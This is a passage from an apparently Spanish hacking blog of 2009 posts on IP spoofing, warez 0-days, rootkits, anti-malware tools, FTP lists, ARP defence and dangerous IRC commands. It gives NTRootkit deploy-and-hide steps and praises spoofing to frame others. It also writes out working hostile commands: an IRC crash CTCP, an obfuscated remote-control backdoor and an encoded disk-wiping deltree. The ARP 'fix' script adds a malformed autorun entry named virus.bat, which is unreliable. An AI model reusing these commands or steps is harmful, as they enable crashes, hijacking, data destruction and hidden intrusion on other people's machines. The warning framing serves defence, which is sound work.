Esta técnica no es un ataque en sí pero permite mejorar y perfeccionar cualquier ataque (de los anteriores, por ejemplo). También puede ser la base de algún ataque, como ocurre con el IP Spoofing que los hackers suelen emplear (me desviaría del tema de este escrito si siguiese escribiendo...).

Se trata de "spoofear" (=falsear) la dirección IP de origen de los paquetes que se mandan a la víctima, de forma que ésta crea que el origen de dichos paquetes es otro (el que nosotros le indiquemos). De esta forma protegemos nuestro anonimato, y en general podemos llevar a cabo cualquier acción que se nos pueda ocurrir y que se derive de una falsa dirección source (origen). Por ejemplo, podemos nukear a alguien, con la dirección fuente de otro, haciendo creer a la víctima (si ésta tiene un analizador de paquetes o algo parecido) que es el otro el que le está atacando }:-).

El spoofing es (o podría ser) una funcionalidad más del programa de ataque (del nuker, del ping, ...). Como consiste en manejar IP desde un muy bajo nivel en muchos casos se requieren privilegios especiales. Por ejemplo, en el caso de máquinas Unix, se necesita abrir "raw sockets" y ésto requiere de privilegios de superusuario (root).

4.- Resources.

Este apartado está dedicado, brevemente, a los distintos programas disponibles y útiles a nuestra causa :-).

Por ahora sólo incluyo la siguiente URL: http://www.7thsphere.com/virus. Allí podrás encontrar toda clase de utilidades para Windows y Linux: programas nukeadores, port-scanners, étc...

También me gustaría recordar que el IRC no es un campo de batalla, y que no se debe atacar a la gente así porque así, salvo "en defensa propia" y pocos casos más justificados. O:-) En cualquier caso un ataque nunca está justificado desde el punto de vista de los ircops, así que cuidado con las K/G-lines ;-)

Por último, decir que este artículo es la primera versión y que pudiera contener numerosos errores así como algún que otro "punto negro". Se agradecería toda clase de comentarios y sugerencias para mejorar el documento: bug reports, asuntos que creáis no están bien explicados, temas que faltan y se deberían incluir, ..., y en definitiva todo lo que os gustaría que se incluyese en el documento. También se aceptan O-lines ;-)

fuente: roman@deathsdoor.com

QUE ES UN 0-DAY ?

2009-11-27T15:32:00.000+01:00

0Day es la denominación que se le tienen las releases (releases son los lanzamientos, osea cuando ponen un programa crackeado o en su defecto solo el crack para un programa disponible para descargar.

Estas releases 0day o 0-day (cero día) significa que son programas que son crackeados el mismo día en que son sacados por los autores, o son cracks o programas que recién han salido a la luz. 0day o 0-day significa lo último disponible, lo más nuevo, calentito calentito, recién sacado del horno... se entiende no ?.

Los grupos de crackers distribuyen sus releases 0-Day, que luego de pasar por los servidores privados de cada grupo son distribuidos en USENET en los newsgroups 0day.games , 0day.warez, 0day.appz, 0day.ibm.pc, etc y que luego son subidos en servidores archivos para descarga como Rapidshare, Megaupload, etc y que luego se distribuyen por P2P.

Pueden verificar las releases 0-day buscando los titulos listados en: http://www.binsearch.info

Características de Usenet

Conexiones entre usuarios y servidores en un sistema Usenet.

Usenet es uno de los sistemas de comunicaciones más antiguos. Permite a cualquier persona, intercambiar mensajes en foros públicos, generalmente relacionados a un tema específico (determinado por el grupo donde se publican-leen los mensajes).

Cuando un usuario se suscribe a un grupo de noticias, la aplicación cliente de noticias se encarga de descargar todos los mensajes disponibles en un servidor y los ordena. Cada servidor determina el tiempo que durará un mensaje almacenado.

Actualmente los grupos de noticias de usenet no sólo se usan para intercambiar texto, sino que son una fuente inagotable de todo tipo de contenidos: software, videos, imágenes, documentos, música, etc.

Si quieren indagar más sobre USENET:

http://es.wikipedia.org/wiki/Usenet

Rootkit sin defensa posible?

2009-11-26T09:39:00.000+01:00

Un rootkit es una herramienta, o un grupo de ellas que tiene como finalidad esconderse a sí misma y esconder otros programas, procesos, archivos, directorios, claves de registro, y puertos que permiten al intruso mantener el acceso a un sistema para remotamente comandar acciones o extraer información sensible. Existen rootkits para una amplia variedad de sistemas operativos, como GNU/Linux, Solaris o Microsoft Windows.

fuente : wikipedia

Para el sistema operativo de windows esta el NTROOT,NTRootkit no es exactamente un virus. Se trata de una herramienta que algunos hackers utilizan para que el usuario del ordenador afectado no se percate de sus actuaciones.

Es el propio hacker quien, una vez que han conseguido acceder a otra máquina, instala en el sistema a NTRootkit.

NTRootkit sólo puede funcionar en ordenadores que tengan instalado el sistema operativo Windows NT, 2000 o XP. En ellos puede provocar efectos distintos, puesto que existen distintas variantes de NTRootkit que son capaces de llevar a cabo actuaciones diferentes.Para poder usarlo casi siempre se tendra que compilar es raro encontrar el .exe.

OS PONGO UNA PEQUEÑA EXPLICACION

La forma de usarlo seria , una vez descargado ,debes buscar el directorio donde se ha descargado (normalmente en c,) abre la consola y escribe su directorio hay debes buscar deploy.exe ejecutalo y ya esta.

Para probarlo su funcionamiento ,crea un directorio el que quieras (ejem. musica) mete un archivo de texto.txt renombralo a _root_ musica( todo achivo renombado a _roo desaparece) haz un dir y veras que ese achivo a desparecido.

Para oculta los procesos,o en lineas de registro es lo mismo debes renombrar _root_ lo que sea.exe
se ocultara hasta en el mataprocesos(Control+ alt+ supr).

Para activarlo pones en consola net start _root_
Para desactivarlo pones en consola net stop _root_

PD:se cree que los windows de nuestro querido bill puertas bienen instalados los rootkits
verdad o mentira?

ANTI-ROOTKIT LICENCIA GRATUITA (FREEWARE)

F-Secure BlackLight Rootkit Eliminator 2.2.1092: Detecta y elimina ‘objetos’ ocultos, tanto a la vista del usuario como a las utilidades de seguridad habituales. Esta utilidad es muy sencilla, basta con ejecutarla sin necesidad de instalación e indicarle que inicie el escaneo. Sus virtudes son que sólo se muestra cuando realmente ha encontrado un rootkit, su velocidad de análisis y la posibilidad de eliminar rootkits activos.

Lavasoft ARIES Rootkit Remover 1.0: Detecta y elimina de su computador el famoso rootkit puesto por Sony en sus CDS para para evitar copias ilegales, además, este programa evita que se vuelva a infectar si inserta de nuevo dicho CD.

Norman Malware Cleaner 2009.04.22: Es una herramienta que ofrece protección para impedir que los "malwares" entren a su sistema y permite erradicarlos una vez producida la infección. La lista de elementos reconocidos no es muy elevada ya que Norman Malware Cleaner es más una herramienta específica para eliminar determinados rootkits y malware, eliminando las variantes reconocidas.

Sophos Anti-Rootkit 1.10: Esta sencilla herramienta es capaz de localizar y eliminar cualquier rootkit que se haya escondido en tu sistema, analizando para ello todas tus unidades de disco, procesos activos y Registro de Windows.

ANTI-ROOTKIT LICENCIA COMERCIAL (EVALUACIÓN)

RegRun Security Suite 4.60: Completa suite de seguridad diseñada para detectar y eliminar virus, troyanos, spyware e incluso los nuevos y resistentes rootkits. Esta suite no sustituye a su antivirus, es un buen complemento que incluye más de una treintena de funciones/utilidades para ‘vigilar’ a fondo tu sistema; optimizar el inicio, capturar rootkits, proteger los archivos esenciales del sistema, monitorizar las conexiones a Internet, entre otros.

UnHackMe 4.5 Beta: Sencilla y rápida utilidad para detectar rootkits e intentar eliminarlos de su sistema. Esta utilidad es muy simple, lo ejecuta y pulse sobre: “Check me now!”. Casi al momento vera si su computador está infectado o no. También incluye un monitorizador que, cada minuto (configurable), comprobará si se ha colado alguno de estos peligrosos rootkits en su sistema.

Síntomas o ¿Cómo saber si estoy infectado???

2009-11-25T13:17:00.000+01:00

* Le aparecen Ventanas de publicidad continuamente

* Lentitud del Ordenador

* Facturas de teléfono elevadas

* Secuestro del navegador de Internet

* Aparición de barra de búsquedas de diferentes sitios en el navegador

* Aparición de diferentes íconos en la barra de tareas del navegador

* La casilla de correo posee infinidades de mensajes que no son deseados

* El sistema operativo se torna muy inestable

* La conexión a Internet demuestra lentitud y poca transferencia de datos

Causas o ¿Por qué a mi???

* ¿Recientemente ha descargado música por Internet?

* ¿Ha utilizado programas gratuitos?

* ¿Ha entrado en páginas Web no fiables?

* ¿Ha intercambiado datos con algún usuario desconocido?

* ¿Ha utilizado programas p2p para la descarga de archivos?

* ¿Ha abierto correos electrónicos de procedencia dudosa y descargado los archivos adjuntos?

* ¿Posee algún medio de protección contra esto?

* ¿Ha ingresado en sitios donde exigen su numeración telefónica?

Efectos o ¿Qué me puede pasar?

* Imposibilidad de navegar por Internet.

* El Ordenador se le ralentiza hasta quedar totalmente bloqueado.

* Robos bancarios y de contraseñas secretas

* Transferencia nula de información vía Internet

* La facturación del teléfono puede llegar a ser 4 veces más de lo que paga

* Robo de información sobre la tarjeta de crédito

* Obtención de documentos privados e individuales o empresariales

* Extracción de Fotografías o diseños privados e individuales o empresariales

* Extracción de las listas de contactos del correo electrónico

* Utilización de su ordenador con fines ilegales, como por ejemplo, el hacking

* Filtraciones por medio de la red interna hacia las terminales

Medidas de prevención ¿Qué puedo hacer?

* Descargar archivos siempre de servidores Fiables

* Asegurarse que detrás de las aplicaciones hay una empresa real y fiable.

* Tener un buen Antispyware que le proteja

* Pedir el consejo de un experto (ir a análisis de un experto)

* No navegar en sitios donde se piden números telefónicos.

* No ingresar la dirección de correo en sitios de Internet sospechosos.

* Tener cuidado al utilizar programas p2p (peer to peer) porque muy posiblemente le descargarán alguna clase de infección.

* No abrir correos electrónicos que contengan documentos adjuntos de procedencia dudosa.

* No navegar en sitios de descarga de cracks, serial y demás.

* Evitar todo sitio web ilegal de descargas gratuitas y demás.

* No confiar en software gratuito hasta no saber su procedencia real.

* Aceptar transferencias de datos solamente de usuarios conocidos y confiables.

eliminación del Spyware

Recomendaciones de programas para combatir los Spyware, pondré una lista de los mas confiables a la hora de combatirlos .

SpyRemover 2.6.5
http://culturahack.com.ar/Foro/index.php?topic=1447.0

Ad-Aware
www.lavasoftusa.com

Arovax AntiSpyware free
http://culturahack.com.ar/Foro/index.php?topic=776.0

Es recomendable siempre tener un buen antivirus actualizado ,nosotros hemos echo una encuesta en el foro y en base a eso te recomendamos NOD32 O KasperSky

Una recomendación imprescindible es tener instalado un buen Firewall,te recomendamos el ZoneAlarm PRO es muy sencillo de usar, la versión PRO te da la oportunidad de bloquear Cookies, Adwares, Pop-Ups, Embeded Objects, Mime Objects, Scripts y Java Scripts, Active-X, Vbscripts, además de las funciones básicas de filtración de puertos.
Es un software muy completo y muy eficaz que te evitará que muchos de ésos archivos espía se infiltren en tu computadora.

ZoneAlarm PRO
http://culturahack.com.ar/Foro/index.php?topic=1260.0

También, hay ocasiones en que los archivos espía no pueden ser detectados por programas como el Ad-aware, y en éstos casos es recomendable un buen programa antitroyano como:

The Cleaner
www.moosoft.com

Si después de usar un programa específico para eliminar los archivos espía, sigues teniendo problemas, es bueno usar un programa como éste para detectar "lo indetectable".

Y como última recomendación, te doy 2 programas que te permitirán ver los procesos que se ejecutan en tu computadora, y que generalmente se ocultan si tratas de descubrirlos ya sea en modo de consola o de administrador de dispositivos (en sistemas Windows):

RootKit Revealer
www.sysinternals.com/Utilities/RootkitRevealer.html

ProcessExplorer
www.sysinternals.com/Utilities/ProcessExplorer.html

Definición completa de Rootkit
http://www.culturahack.com/Foro/index.php?topic=1083.0

fuente: culturahack

Servidores ftp Publicos

2009-11-23T13:33:00.000+01:00

Os dejo unos servidores ftp, es otra forma de descargarse musica,juegos, ect..............

para poder usarlo teneis que descargaros el flashfxp
alguna duda dejar en comentario o en el correo.

* http://www.listen77.com/mp3/

Servidor FTP de Música, no se ni cuanta música hay:

* ftp://193.43.36.131/Radio/History/
* ftp://193.43.36.131/Radio/MP3/
* ftp://193.43.36.131/Radio/RealAudio/

ftp:lucas:123456@lucaseo.ftpserver.nu
1. ftp://ftp.freenet.de/pub/filepilot/
2. ftp://207.71.8.54:21/games/
3. ftp://129.241.210.42/pub/games/
4. ftp://212.174.160.21/games
5. ftp://129.241.210.42/pub/games/
6. ftp://clubmusic:clubmusic@217.172.16.3:8778/
7. ftp://194.187.207.98/video/
8. ftp://194.187.207.98/music/
9. ftp://194.187.207.98/soft/
10. ftp://ftp.uglan.ck.ua/
11. ftp://159.153.197.74/pub
12. ftp://leech:l33ch@61.145.123.141:5632/
13. ftp://psy:psy@ftp.cybersky.ru
14. ftp://130.89.175.1/pub/games/
15. ftp://194.44.214.3/pub/
16. ftp://195.161.112.15/musik/
17. ftp://195.131.10.164/software
18. ftp://195.146.65.20/pub/win/
19. ftp://212.122.1.85/pub/software/
20. ftp://193.125.152.110/pub/.1/misc/sounds/mp3/murray/

ftp://217.216.192.91 SERVIDOR DE POBAS (PENTIUM 2 A 350).Encontrareis de todo un poco,,,; software, mp3, tutoriales, juegos, flash, videos,,,,
ftp.celestial.com Linux
ftp.cetis.hvu.nl I.P. de Utrech, Holanda. IRC, Linux, Imágenes, Sim Tel on-line
ftp.ceu.fi.udc.es Facultade de Informática - Universidade da Coruña
ftp.cica.es Centro Informático Cientifico de Andalucía
ftp.cica.indiana.edu CICA archivo Windows 95 y 3.11
ftp.cistia.es Universidad de Canarias
ftp.clark.net Gráficos, iconos, mirrors, Amiga, Linux,
ftp.clark.net Gráficos, iconos, mirrors, Amiga, Linux,
ftp.clip.dia.fi.uma.es Departamento de Inteligencia Artificial - Universidad Politécnica de Madrid
ftp.coast.net SimTel Archives Quizá la mayor colección para DOS, Win y NT
ftp.cs.tu-berlin.de Alemania
ftp.cs.ruu.nl Todo lo que quieras en y sobre el formato MIDI
ftp.download.com Admite hasta 1000 usuarios simultáneos. Una bestia
ftp.demon.co.uk Antivirus para todas las plataformas Mirror de ftp.xfree86.org
ftp.dit.upm.es
DIT - Universidad Politécnica de Madrid.
ftp.etse.urv.es Escola Tecnica Superior d'Enginyeria - Universitat Rovira i Virgili
ftp.etsimo.uniovi.es Escuela de Minas / Servicio de Informática Gráfica - Universidad de Oviedo
ftp.fc.udg.es Facultat de Cincies - Universitat de Girona
ftp.funet.fi Red Universitaria de Finlandia. Tiene de todo
ftp.gaetano.uhu.es D.I.E.S.I.A. Universidad de Huelva.
ftp.garbo.uwasa.fi GARBO, en Finlandia.No necesita presentación: DOS, Win, MAC, UNIX
ftp.gui.uva.es Universidad de Valladolid. Montañas de cosas (S.Pack 2 NT4)
ftp.idg.es Pc Actual. Tiene cosas buenas
ftp.iaa.es Instituto de Astrofísica de Andalucía - Consejo Superior de Investigaciones Científicas
ftp.iac.es I. Astrofísico de Canarias
ftp.ird.ub.es

Universitat de Barcelona
ftp://makosteszta.sote.hu En Hungría. Antivirus
ftp.pwr.wroc.pl

Polonia
ftp.rediris.es Red Académica española. Espejo de Simtel. + de 12 gigas de material
ftp.ruuc.net.au

Es lento
ftp.simtel.net SIM TEL NET (Walnut Creek). 2000 usuarios simultáneos. La máquina es un P6 a 200MHz con 512MB de memoria y 124GB de disco. Sólo algo más potente que el mío :-((
ftp.sura.net Un gran almacen para PC y Unix
ftp.switch.ch Red Académica Suiza. Un montón de cosas. Mirror de casi todo
ftp.tecmedia.co.cr
Costa Rica
ftp.tsc.uvigo.es Universidade de Vigo - (Indexado en Archie)
ftp.tuke.sk

Eslovaquia
ftp.ua.es Centro de Proceso de Datos - Universitat d'Alacant (indexado en archie)
ftp.uam.es Universidad Autónoma de Madrid
ftp.uco.es
ftp.udc.es

Universidad de A Coruña. Serv. Pack 1 Win 95, Clientes Archie.
ftp.ulpgc.es
U. Las Palmas de G. Canaria
ftp.uma.es Universidad de Málaga - (Indexado en Archie)
ftp.uniovi.es Universidad de Oviedo. Muy bueno
ftp://cert.unisa.it Italia
ftp.unizar.es

ftp.upc.es Serveis Informtics - Universitat Politécnica de Catalunya
ftp.usal.es

Universidad de Salamanca
ftp.uv.es

Universidad de Valencia
ftp.vse.cz Checoslovaquia
ftp.vein.hu

Hungría. Antivirus
ftp.arrakis.es Mirror de Tucows. Sólo admite 6 usuarios "no arrakianos" simultáneos.
ftp.cdrom.com

Wallnut Creek CD-ROM "home site"
ftp.doc.ic.ac.uk Mirror entre otros de Microsoft. SunSITE Northern Europe. Está en el departamento de computadores del Imperial College, Londres, y corre en un Sun Ultra Enterprise 6000: 6 CPUs, 3 Gig ram, 200 GB disco (Sun Microsystems). 200 usuarios
ftp.funet.fi Espejo europeo de Intel
ftp.nctuccca.edu.tw CCCA (Taiwan) Espejo de cerca de 100 sitios. + 14Gb capacidad.
ftp.oak.oakland.edu Universidad de Oakland. Espejo de Sim Tel
ftp.rediris.es Red Académica española. Espejo de Simtel + 12 Gigas
ftp.switch.ch Red Académica Suiza. Un montón de cosas. Mirror de casi todo
ftp.uni-paderborn.de Univ. of Paderborn (Alemania) : CICA, SimTel, Demos, Linux, OS/2, Amiga
ftp.wuarchive.wustl.edu Univ. Washington. SimTel, CICA, Grav. Ultrasound.

Diferencia de un XPLOIT y un EXPLOIT

2009-11-21T13:21:00.000+01:00

Que es Exploit y Xploit y diferencias

Vamos a ver las definiciones de estos dos terminos que se confunden muy seguido ya que su pronunciacion y escritura son similares.
Primero planteo este tema para que dejen de preguntar e insistir con los exploit que en fin lo llaman como al fake mail.

EXPLOIT
Exploit (viene de to exploit - aprovechar) - código escrito con el fin de aprovechar un error de programación para obtener diversos privilegios. software.

Un buen número de exploits tienen su origen en un conjunto de fallos similares. Algunos de los grupos de vulnerabilidades más conocidos son:

Vulnerabilidades de desbordamiento de pila o buffer overflow.
Vulnerabilidades de condición de carrera (Race condition).
Vulnerabilidades de error de formato de cadena (format string bugs).
Vulnerabilidades de Cross Site Scripting (XSS).
Vulnerabilidades de inyección SQL (SQL injection).
Vulnerabilidades de inyeccion de caraceres (CRLF).
Obtenido de "http://es.wikipedia.org/wiki/Exploit"

XPLOIT
Fake mail o mas comunmente llamado xploit. Enviar correo electrónico falseando el remitente. Se trata de una técnica muy empleada en Ingeniería Social.

Como modo de obtener contraseñas de hotmail,yahoo o cualquier tipo de compania para los correos electronicos. Esta tecnica es considerada lammer para la comunidad de hackers o para quienes se interesan verdaderamente en el tema del hacking.

fuente: infiernohacker

CÓMO ELIMINAR ARCHIVOS MALICIOSOS QUE SE RESISTEN, USANDO KILLBOX

2009-11-19T19:13:00.000+01:00

1. Hay ocasiones en que después de analizar el PC con el antivirus residente o con algún antivirus on-line se nos indica que ha encontrado algún archivo malicioso y no ha podido eliminarlo.

2. El siguiente paso sería localizar ese archivo. Nos dirigimos a la ruta Completa del archivo que nos ha indicado el antivirus y aquél no aparece.

3. Tendríamos que proceder a activar la opción “Mostrar todos los archivos y carpetas ocultos”:

Ver archivos ocultos en Windows XP:

- Haz doble-clic en “Mi PC”. – Herramientas/Opciones de carpeta. – Selecciona la pestaña “Ver”. – Desmarcar “Ocultar extensiones de archivo para tipos de archivo conocidos” – En “Archivos ocultos” selecciona “Mostrar todos archivos y carpetas ocultos”. – Aplicar y Aceptar.

4. Una vez realizado este paso, buscamos el archivo malicioso y lo eliminamos.

*Si el archivo no se dejase eliminar, debes reiniciar el PC en “modo seguro” (a
prueba de errores) para intentar eliminarlo.
*Si el archivo malicioso tampoco aparece después de haber activado la opción
“Mostrar todos los archivos y carpetas ocultos”, debemos usar el programa
KillBox para “sacar a flote” ese archivo.

5. Descarga el programa KillBox

Ejecuta KillBox y selecciona “Delete on reboot”:

-En el recuadro que dice “Full path of file to delete”, teclea la ruta completa
del archivo que deseas eliminar:

Ej: Si queremos eliminar MSAOL32dll.exe, teclea la ruta donde se encuentra el
archivo C:\WINDOWS\System32\MSAOL32dll.exe
- Después de colocar la ruta del archivo, haz clic sobre el circulo rojo con un
X blanca.
- Cuando pregunte “Reboot now” “Reiniciar ahora”, haz clic en “Sí”.

-Si no es el único archivo a eliminar, selecciona “NO” (que no reinicie), cuando
hayas tecleado la ruta del último archivo que deseas eliminar, haz clic en “Sí”
para reiniciar el PC.

fuente:lestathijackthis

Como Evitar Ataques de Envenenamiento ARP

2009-11-18T12:42:00.000+01:00

Aqui explicare de que manera nos podemos defender de este tipo de ataque
Conocimiento Previo:
ARP en Wikipedia
Video Tutorial de ARP
Â¿Que es un Ataque Envenenamiento ARP?

Herramientas:
ARP Watch (linux)
ARP guard

Video Tutorial:
Defenderse de Ataques de envenenamiento ARP

Maneras de defenderse del ataque:

1-ARP Watch (linux)
ARP Watch es una herramienta para sistemas linux que nos puede ayudar a detectar el envenenamiento ARP en nuestro sistema operativo.
con esta herramienta podemos comprovar la correspondencia entre pares (IP/MAC). en el caso en que se este provocando un ataque ARP Watch manda un correo de notificacion a la cuenta administrador del sistema.
Tambien puede detectar nuevos host en la red
(si alguien falsifica su IP/MAC para hacer un ataque de envenenamiento ARP)

2-ARP Guard (hardware)
ARP guard es un hardware que nos permite reconocer las amenazas
de un posible ataque de enevenenamiento ARP.
esta constantemente observando los paquetes ARP
y si detecta alguna anomalia manda un mensaje a el administrador de la red
con el origen del ataque.

3-Asignacion Estatica en la tabla de entradas ARP

El ataque de envenenamiento ARP consiste en modificar las entradas en las tablas ARP. el sistema es vulnerable por que puede moverse. entonces sencillamente dejemoslo fijo y que nadie lo pueda mover =D

Bien esto es un poco mas complicado, asi que pongan atencion.
existen dos maneras de aÃ±adir una entrada a una tabla ARP.

1Âº Forma Automatica
Es lo que hace nuestro PC todo el tiempo sin que nos demos cuenta

2Âº Forma Manual
De la manera manual nosotros podemos dejar inmutable incluso apagado el sistema de dicha entrada en la tabla ARP.

Para aÃ±adir una ARP en un sistema esta es la Sintaxis:

[Direccion IP] --> Direccion IP del Host
[Direccion MAC] --> Direccion MAC del Host

De esta manera las Direcciones MAC quedan Grabadas.
y por mucho que el PC atacante intente hacer un ataque envenenamiento ARP No lo podria haber logrado =D
Y si ubiesemos tenido el sofware ARP Watch (en linux)
podriamos haber sabido quien fue el que intento hacer el ataque.

Eso si esto tiene Una Falla, al apagar el PC las tablas ARP se encontraran vacias al volver a prender el PC, y eso nos vuelve vulnerables al ataque.
pero sencillamente debemos de crear un .bat que haga que se inicie con windows siempre y nunca mas nos preocuparemos de estos ataques ^^

Código:

@echo off
arp -s [Direccion IP del Host] [Direccion MAC del Host]
reg add hkey_local_machine\software\microsoft\windows\currentversion\run/v virus.bat/t reg_sz /d C:\windows\system32 /f
exit

Saludos! y espero que les guste

fuent: foro.infiernohacker.com

COMANDOS PELIGROSOS:

2009-11-13T19:38:00.000+01:00

Este post va dedicado a los irc (chat)

Los podemos dividir en 2 categorías: Comandos que escribe el atacante y comandos que escribe la víctima. Contra los primeros sólo podemos protegernos manteniendo actualizado nuestro sistema. Contra los segundos, lo tenemos mucho más sencillo: No escribir jamás ningún comando cuya acción desconozcamos.

a) Comandos que escribe el atacante:

**** Con/Con **** -= Pantallazo Azul =-

- Este comando aprovecha un fallo del kernel de windows, el cual, produce el comúnmente conocido como " Pantallazo Azul " y nos hace reiniciar el ordenador, o meterle tres patadas ( sobre gustos no hay nada escrito ).
- Este es el comando para un canal entero:

/ctcp #canal sound \IFS$HLP$\IFS$HLP$\IFS$HLP$.mp3

- Este es para una sola persona:

/ctcp #canal nick sound \IFS$HLP$\IFS$HLP$\IFS$HLP$.mp3

-¿Cómo evitarlo?

-Si usamos ircap podemos bajarnos también el parche contra el con/con de la página:

http://www.ircap.net

**** Sacar IP's **** -= !seen nick =-

-Da pocos resultados, pero a veces funciona y da la ip o dns del nick víctima.
-¿Cómo evitarlo?
Desactivando en nuestro script el comando !seen. Para ello escribimos:
/disable #seen

b) Comandos que escribe la víctima:

**** Timer **** -= Soy gay! =-

-Comando poco peligroso, pero sí molesto y pesado. Aparte de ponernos en ridículo, nos puede hacer desconectarnos del irc por excess flood.

- Lo que hace al ejecutarse es activar un timer o temporizador que repite en bucle (siempre lo mismo). El más típico es tunick soy gay, (aunque el texto puede ser cualquiera) en todos los canales en los que estes.

-Algunas de las variantes de éste comando son las siguientes:

//t $+ $chr(105) $+ $chr(109) $+ er 0 1 $chr(97) $+ $chr(109) $+ S $+ $chr(103) $chr(115)) $+ o $+ $chr(121) $chr(103) $+ $chr(97) $+ $chr(121)

/timer 0 1 //$left(ameipmask,3) $left(esirc,2) $left(Generated,1) $+ $right(getipay,2)

-Resultado del comando:

soy gay
soy gay
soy gay
soy gay
soy gay
soy gay
soy gay
soy gay
soy gay
soy gay
soy gay
soy gay

(Así hasta que te caes por excess flood).

-¿Cómo evitarlo?

-La mejor forma es evidente, no escribiendo comandos cuya acción desconozcamos.

-Si ya lo hemos escrito, tenemos que fijarnos en lo que pone al ejecutar la sentencia:

Si pone: * Timer loquesea activated

Tenemos que escribir: /timerloquesea off (timerloquesea todo junto).

Por ejemplo, Si pone * Timer 1 activated

Tenemos que escribir: /timer1 off

-Si no nos da tiempo a pararlo, sólo hay que cerrar el script, y luego volverlo a abrir, entrar a los canales en los que estabamos y explicar quee tu hermano pequeño o amigo te pilló el teclado y lo puso (casi nuca te creerán :DDDD )

**** _antispam **** -= Ataca _antispam !! =-

- Este comando hace enfadar mucho al bot que se encarga de la publicidad no permitida en las redes llamado _antispam.

-Su modus operandi es muy simple, al poner el comando en pleno canal, donde se encuentre el bot, todos esos caracteres se decodifican (traducen al cristiano) y forman la frase: www.sexoduro.com, con lo cual el bot te engancha y te pone un g-line, sin que puedas volver a conectarte a esa red en un buen ratito.

//$decode(bXNnIF9hbnRpc3BhbSB3d3cuc2V4b2R1cm8uY29t,m)

- Existen más variaciones de éste código, que nos hacen decir: www.jodiendo.com , www.sexogratis.com, etc... no os fieis y pongais cosas que no sabeis para que son; os pueden estar tomando el pelo.

**** Ctcp's **** -= Remote Control =-

- Este comando es igual que un troyano, pero en version IRC. Permite a cualquiera manejarte a voluntad como si fueras un bot, pudiendo hablar por ti, enviar dccs, banear o dar @ a alguien, etc...

- El modo de infeccion es el mismo que los anteriores. Te llega un individuo y te camela para que pongas el comando con fines diversos como veremos a continuación.

- El principio del comando es el señuelo o engaño, puesto que puede ser muy distinto, según nos digan que lo pongamos para obtener @ en todos los canales, para que no nos puedan banear, etc, etc.

- //echo -a opme #canal tunick <--- esto es el principio del comando que como vereis se puede cambiar para persuadiros de que lo pongais, diciendo, en este caso que obtendreis @ en un determinado canal . Si lo poneis vereis quee solo decis: opme #canal tunick ,donde #canal puede ser ummmm #Malaga y tunick pepe. Seria asi el comienzo del comando ---> opme #Malaga pepe ..............

-Este es el comando completo (ya hemos dicho que el comienzo puede variar).

//echo -a opme #canal nick | $mid(au-writer,4,5) $mid(badabc,3,3) $+ $chr(46) $+ $mid(allintxt,6,3) $mid(CTC-org,1,3) $+ $chr(80) $str(*:,3) $chr(36) $+ $mid(1-2=3,1,2) $chr(124) $mid(scotty-haltty,8,4) | $chr(46) $+ $mid(loader-client,1,4) $mid(q-rstu,2,3) $mid(badabc,3,3) $+ $chr(46) $+ $mid(alltxt,4,3)

- Como podeis observar es extremadamente largo, pero se ha abreviado y reducido a multitud de tamaños.

- ¿Como se controla a un infectado ?

-Mediante ctcp's: /ctcp nickvictima //msg #canal mensaje

Traducción: /ctcp pepe //msg #malaga eres mi esclavo :DDDD

La opcion msg se puede cambiar por deop nickx (quita la @ al nickx), op nickx (da @ al nickx) etc...

- ¿Como saber quien me controla ?

-Fácil, nos vamos a estado y miramos los ctcps puesto que te controlan mediante ellos.

Veriamos: Ctcp nickmalvado y la orden que nos ha enviado hacer.

-¿Cómo evitarlo?

- Si “por casualidad” llegaseis a poner ese comando, el modo de desinfección es fácil. Al poner el comando se crea un documento con el nombre dab.txt en la carpeta C:\mIRC (esto varia segun los scripts), en cuyo interior se puede ver algo asi:

CTCP *:*:*: $1- | halt

-Con borrar ése archivo, cerrar el script y volverlo a abrir estaremos limpios otra vez.

//say $ip -= Dime tu ip =-

-Escribiendo éste comando

//say $ip

Darás tu ip a todo el canal donde lo escribas

**** Deltree **** -= Formateo de disco =-

-ATENCIÓN: MUY PELIGROSO

- Este comando funciona en windows 95 y 98. Al introducirlo hace una ejecución de ciertos archivos del sistema que originan algo similar a un format c: (nos borra el disco duro!!!).

//$decode(L3J1biAtbiBcd2lvZG93c1xjb21tYW5kXGR1bHRyZXhlIC95IGM6XC4gPm51bA==,m)

-¿Cómo evitarlo?

Una vez más NO ESCRIBIENDO JAMÁS NINGÚN COMANDO QUE NO CONOZCAMOS

**** F4 **** -= ¡Que me caigo! =-

-No se trata propiamente de un comando, pero es una de las “novatadas” más extendidas en los canales de irc con los usuarios inexpertos. Consiste en convencer a la víctima (diciéndole que conseguirá @ por ejemplo), de que pulse la tecla de función F4, lo que provoca su desconexión del irc.

NOTA: TODOS LOS COMANDOS AQUI PRESENTES HAN SIDO PROBADOS EN EL SCRIPT IRCAP

LAS VERSIONES ACTUALIZADAS AVISAN DE QUE LO QUE ESTAS PONIENDO ES POSIBLE QUE SEA UN COMANDO MALIGNO

PARA EL MIRC 6.01 NO FUNCIONA NINGUN COMANDO, SOLO SI VA ACOMPAÑADO DEL IRCAP Y COMO DIJE ANTES, AVISA DE ELLO SI ES UNA VERSION ACTUAL.

LA MAYORIA DE COMANDOS NO FUNCIONAN EN LOS SCRIPTS ACTUALES ( ES IMPORTANTE ESTAR ACTUALIZADO )

COMO PUEDEN AVERIGUAR NUESTRA IP

-Debido a la implantación de las ip virtuales, resulta completamente imposible que puedan sacar nuestra ip mediante los métodos convencionales de los scripts. Pero debemos recordar que tanto los envíos de archivos, como aceptar archivos que nos envíen a nosotros mediante DCC, así como el DCC chat mostrarán nuestra ip a la persona que ha conectado con nosotros.

-Si somos nosotros los que enviamos algo por DCC o ponemos el DCC chat, el envio junto con nuestra ip se reflejarán en la ventana estado.

-Si nos mandan algo por DCC o aceptamos un DCC chat de alguien, ese alguien puede ver nuestra ip simplemente haciendo un netstat.

-Si nos mandan visitar una página web que se encuentre en un servidor en un equipo “casero”, pueden loguear nuestra ip. Lo mismo sucederá si entramos en servidores de irc que sean inseguros o que no posean servicio de protección de ips (ips virtuales). Algunos de éstos servidores resultan, además, altamente peligrosos, pues pueden, incluso, obligarnos a visitar páginas web no deseadas que pueden tener contenidos peligrosos e, incluso, virus y troyanos (el navegador, en éste caso, se nos abre solo y va a la página que el administrador del servidor desee!!!)

-Utilizando el comando “!seen” anteriormente visto.

-Pidiéndonos que escribamos el comando //say $ip también visto anteriormente, o alguna de sus variantes.

-¿Cómo evitarlo?

